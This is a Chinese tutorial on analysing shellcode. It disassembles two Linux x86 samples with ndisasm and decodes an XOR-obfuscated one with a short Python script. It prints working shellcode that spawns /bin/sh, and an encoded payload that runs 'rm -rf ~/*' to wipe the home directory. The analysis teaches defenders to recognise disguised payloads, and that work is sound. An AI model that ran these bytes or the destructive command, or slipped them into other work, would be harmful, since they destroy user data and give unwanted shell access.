Shellcode的分析調試技巧

下面，我們將分析幾個已有的shellcode的功能，通過分析，了解shellcode分析的技巧。

第一個shellcode代碼如下：

1. static char shellcode[]=
2. "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
3. "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
4. "\x2f\x73\x68\x58";

使用ndisasm反匯編結果如下:

1. root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
2. 00000000 EB17 jmp short 0x19
3. 00000002 5E pop esi
4. 00000003 897608 mov [esi+0x8],esi
5. 00000006 31C0 xor eax,eax
6. 00000008 884607 mov [esi+0x7],al
7. 0000000B 89460C mov [esi+0xc],eax
8. 0000000E B00B mov al,0xb
9. 00000010 89F3 mov ebx,esi
10. 00000012 8D4E08 lea ecx,[esi+0x8]
11. 00000015 31D2 xor edx,edx
12. 00000017 CD80 int 0x80
13. 00000019 E8E4FFFFFF call dword 0x2
14. 0000001E 2F das
15. 0000001F 62696E bound ebp,[ecx+0x6e]
16. 00000022 2F das
17. 00000023 7368 jnc 0x8d
18. 00000025 58 pop eax
19. root@linux:~/pentest#

可以看出，這是一個執行“/bin/sh”的shellcode。

第二個shellcode代碼如下：

1. char shellcode2[] =
2. "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
3. "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
4. "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
5. "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
6. "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
7. "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
8. "\x7b\x35";

下面使用ndisasm反匯編，結果如下：

1. root@linux:~/pentest# echo -ne
2. "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
3. 00000000 EB10 jmp short 0x12
4. 00000002 5E pop esi
5. 00000003 31C9 xor ecx,ecx
6. 00000005 B14B mov cl,0x4b
7. 00000007 B0FF mov al,0xff
8. 00000009 3006 xor [esi],al
9. 0000000B FEC8 dec al
10. 0000000D 46 inc esi
11. 0000000E E2F9 loop 0x9
12. 00000010 EB05 jmp short 0x17
13. 00000012 E8EBFFFFFF call dword 0x2
14. 00000017 17 pop ss
15. 00000018 DB db 0xdb
16. 00000019 FD std
17. 0000001A FC cld
18. 0000001B FB sti
19. 0000001C D59B aad 0x9b
20. 0000001E 91 xchg eax,ecx
21. 0000001F 99 cdq
22. 00000020 D9869CF38199 fld dword [esi-0x667e0c64]
23. 00000026 F0C28DED lock ret 0xed8d
24. 0000002A 9E sahf
25. 0000002B 86CA xchg cl,dl
26. 0000002D C49A81C69BCB les ebx,[edx-0x3464397f]
27. 00000033 C9 leave
28. 00000034 C2D3DE ret 0xded3
29. 00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8
30. 0000003D AC lodsb
31. 0000003E B4BB mov ah,0xbb
32. 00000040 D6 salc
33. 00000041 88E5 mov ch,ah
34. 00000043 13825C8DC19D adc eax,[edx-0x623e72a4]
35. 00000049 40 inc eax
36. 0000004A 91 xchg eax,ecx
37. 0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c
38. 00000052 2F das
39. 00000053 4A dec edx
40. 00000054 23F0 and esi,eax
41. 00000056 120F adc cl,[edi]
42. 00000058 B570 mov ch,0x70
43. 0000005A 3C32 cmp al,0x32
44. 0000005C 7988 jns 0xffffffe6
45. 0000005E 78F7 js 0x57
46. 00000060 7B35 jpo 0x97
47. root@linux:~/pentest#

接下來，我們將使用一個python腳本和hexdump來分析這個shellcode。

1. root@linux:~/pentest# cat decode.py
2. #!/usr/bin/env python
3. sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" + \
4. "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \
5. "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \
6. "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \
7. "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \
8. "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \
9. "\x7b\x35"
10. print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
11. root@linux:~/pentest# ./decode.py | hexdump -C
12. 00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.|
13. 00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>|
14. 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]|
15. 00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.|
16. 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...|
17. 0000004c
18. root@linux:~/pentest#

可以看到“/bin/sh”“sh”“rm –rf ~/* 2>/dev/null”幾條指令，接下來我們使用ndisasm分析：

1. root@linux:~/pentest# ./decode.py | ndisasm -u -
2. 00000000 E825000000 call dword 0x2a
3. 00000005 2F das
4. 00000006 62696E bound ebp,[ecx+0x6e]
5. 00000009 2F das
6. 0000000A 7368 jnc 0x74
7. 0000000C 007368 add [ebx+0x68],dh
8. 0000000F 002D6300726D add [dword 0x6d720063],ch
9. 00000015 202D7266207E and [dword 0x7e206672],ch
10. 0000001B 2F das
11. 0000001C 2A20 sub ah,[eax]
12. 0000001E 323E xor bh,[esi]
13. 00000020 2F das
14. 00000021 6465762F gs jna 0x54
15. 00000025 6E outsb
16. 00000026 756C jnz 0x94
17. 00000028 6C insb
18. 00000029 005D31 add [ebp+0x31],bl
19. 0000002C C0508D5D rcl byte [eax-0x73],0x5d
20. 00000030 0E push cs
21. 00000031 53 push ebx
22. 00000032 8D5D0B lea ebx,[ebp+0xb]
23. 00000035 53 push ebx
24. 00000036 8D5D08 lea ebx,[ebp+0x8]
25. 00000039 53 push ebx
26. 0000003A 89EB mov ebx,ebp
27. 0000003C 89E1 mov ecx,esp
28. 0000003E 31D2 xor edx,edx
29. 00000040 B00B mov al,0xb
30. 00000042 CD80 int 0x80
31. 00000044 89C3 mov ebx,eax
32. 00000046 31C0 xor eax,eax
33. 00000048 40 inc eax
34. 00000049 CD80 int 0x80
35. 0000004B 0A db 0x0a
36. root@linux:~/pentest#